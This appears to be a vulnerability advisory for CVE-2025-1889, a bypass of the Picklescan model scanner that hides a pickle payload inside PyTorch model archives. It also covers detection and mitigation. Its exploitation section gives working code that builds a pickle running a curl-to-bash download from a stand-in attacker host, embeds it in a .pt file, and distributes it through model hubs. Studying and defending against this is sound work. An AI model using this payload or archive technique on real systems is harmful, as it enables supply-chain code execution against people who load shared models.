PyTorch, Arbitrary Code Execution, CVE-2025-1889 (Critical)

How the CVE Works:

CVE-2025-1889 exploits a vulnerability in Picklescan, a tool designed to detect malicious pickle files in PyTorch model archives. Picklescan relies on file extensions (e.g., .pkl, .pt) to identify which archive entries are pickle files. However, PyTorch's `torch.load()` accepts a `pickle_file` keyword argument that selects a secondary pickle inside the archive, bypassing Picklescan's extension-based detection. Attackers can therefore embed a malicious pickle under a non-standard name (e.g., config.p) inside a model archive. When that hidden pickle is loaded, its payload executes, leading to arbitrary code execution. This vulnerability is particularly dangerous in supply-chain attacks, as PyTorch models are widely shared in repositories like Hugging Face and PyTorch Hub.
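
A minimal sketch of the victim-side trigger, assuming a model archive that already contains a hidden config.p (the PoC for building one follows in the Exploitation section); the `pickle_file` keyword is forwarded by `torch.load()` to its internal archive loader:

    import torch

    # Deserializes the non-default pickle inside the .pt archive; any __reduce__
    # payload in config.p runs at this point. (Recent PyTorch releases default to
    # weights_only=True, which blocks such payloads; the scanner bypass itself is
    # independent of that setting.)
    obj = torch.load("malicious_model.pt", pickle_file="config.p")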

DailyCVE Form:

Platform: PyTorch

Version: All versions

Vulnerability: Arbitrary Code Execution

Severity: Critical

Date: 2025-01-01

What Undercode Say:

Exploitation:

1. Craft Malicious Pickle File: Create a pickle file (config.p) whose payload runs a remote script when it is deserialized.

    import os
    import pickle

    class RemoteCodeExecution:
        # __reduce__ tells pickle how to rebuild the object; returning os.system
        # plus an argument makes the command run during unpickling.
        def __reduce__(self):
            return os.system, ("curl -s http://attacker.com/malware.sh | bash",)

    with open("config.p", "wb") as f:
        pickle.dump(RemoteCodeExecution(), f)
    
2. Embed in Model Archive: Append the malicious pickle to an otherwise ordinary PyTorch model archive.

    import torch
    import zipfile

    # Save a benign-looking model; .pt files are ZIP archives under the hood
    model = {'weights': torch.zeros(1)}
    torch.save(model, "malicious_model.pt")

    # Append the hidden pickle under a non-standard name that Picklescan ignores
    with zipfile.ZipFile("malicious_model.pt", "a") as archive:
        archive.write("config.p", "config.p")

    # Later, torch.load("malicious_model.pt", pickle_file='config.p') deserializes the payload
      
3. Distribute Malicious Model: Upload the model to repositories like Hugging Face or PyTorch Hub.

Protection:

1. Scan All Files: Picklescan should analyze all files in a ZIP archive by content, not just those with standard pickle extensions; use a release that includes the fix for this CVE and scan models before loading them (a stdlib sketch of content-based detection follows).

    picklescan --path malicious_model.pt
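
To see what extension-agnostic scanning means in practice, here is a stdlib-only sketch (not Picklescan's actual implementation) that parses every archive entry as a pickle opcode stream without executing anything:

    import pickletools
    import zipfile

    def find_pickle_entries(archive_path):
        """Return every archive entry that parses as a pickle stream, regardless of extension."""
        hits = []
        with zipfile.ZipFile(archive_path) as archive:
            for name in archive.namelist():
                data = archive.read(name)
                try:
                    # pickletools.genops only parses opcodes; nothing is executed
                    for _ in pickletools.genops(data):
                        pass
                except Exception:
                    continue  # not a valid pickle stream (e.g. raw tensor storage)
                hits.append(name)
        return hits

    # Expect both the standard data.pkl and the hidden config.p to be reported
    print(find_pickle_entries("malicious_model.pt"))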
        

2. Detect Hidden Pickle References: Use static analysis to identify `torch.load(pickle_file=...)` calls in code before running it (a usage example follows the function).

    import ast

    def detect_pickle_file_usage(code):
        # Flag any call to a `.load(...)` method that passes a pickle_file keyword
        tree = ast.parse(code)
        for node in ast.walk(tree):
            if isinstance(node, ast.Call) and hasattr(node.func, 'attr') and node.func.attr == 'load':
                for keyword in node.keywords:
                    if keyword.arg == 'pickle_file':
                        return True
        return False
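
For example, run against a snippet that loads a hidden pickle versus a normal load (file names mirror the PoC above):

    sample = "import torch\nobj = torch.load('model.pt', pickle_file='config.p')"
    print(detect_pickle_file_usage(sample))                    # True
    print(detect_pickle_file_usage("torch.load('model.pt')"))  # False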
        
3. Magic Byte Detection: Check file contents rather than extensions; binary pickles (protocol 2 and above, which `pickle.dump` and `torch.save` produce by default) start with the PROTO opcode byte \x80 followed by the protocol number.

    def is_pickle_file(file_path):
        # Protocol-2+ pickle streams begin with 0x80 plus a protocol byte (2-5)
        with open(file_path, "rb") as f:
            header = f.read(2)
        return len(header) == 2 and header[0] == 0x80 and 2 <= header[1] <= 5
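
Applied to the PoC artifacts (file names are illustrative), the hidden payload is flagged even though its extension is non-standard:

    print(is_pickle_file("config.p"))   # True: the payload from step 1 is a binary pickle
    print(is_pickle_file("README.md"))  # False for any non-pickle file (illustrative name)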
          

4. Block Dangerous Globals: Restrict the use of `torch.load` and `functools.partial` in untrusted code, for example by hooking the import machinery (a narrower allow-list unpickler is sketched after this item).

    import builtins

    original_import = builtins.__import__

    def safe_import(name, *args, **kwargs):
        # Refuse to import modules whose callables are commonly abused in pickle payloads
        if name in ('torch', 'functools'):
            raise ImportError(f"Import of {name} is restricted.")
        return original_import(name, *args, **kwargs)

    builtins.__import__ = safe_import
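
Blocking whole imports is coarse; a narrower option, adapted from the allow-list `Unpickler` pattern in the Python `pickle` documentation, rejects every global that is not explicitly approved (the allow-list below is only an illustrative assumption):

    import io
    import pickle

    ALLOWED_GLOBALS = {("collections", "OrderedDict")}  # extend deliberately, never with os/subprocess

    class RestrictedUnpickler(pickle.Unpickler):
        def find_class(self, module, name):
            # Called for every GLOBAL opcode; os.system, functools.partial, etc. are refused
            if (module, name) in ALLOWED_GLOBALS:
                return super().find_class(module, name)
            raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

    def restricted_loads(data: bytes):
        return RestrictedUnpickler(io.BytesIO(data)).load()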
          

References:

Reported By: https://github.com/advisories/GHSA-769v-p64c-89pr
